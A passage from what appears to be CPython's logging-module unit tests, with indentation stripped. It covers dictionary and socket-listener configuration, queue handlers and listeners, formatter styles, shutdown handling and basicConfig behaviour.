h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.cpython_only # PyPy doesn't call __del__() at shutdown
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
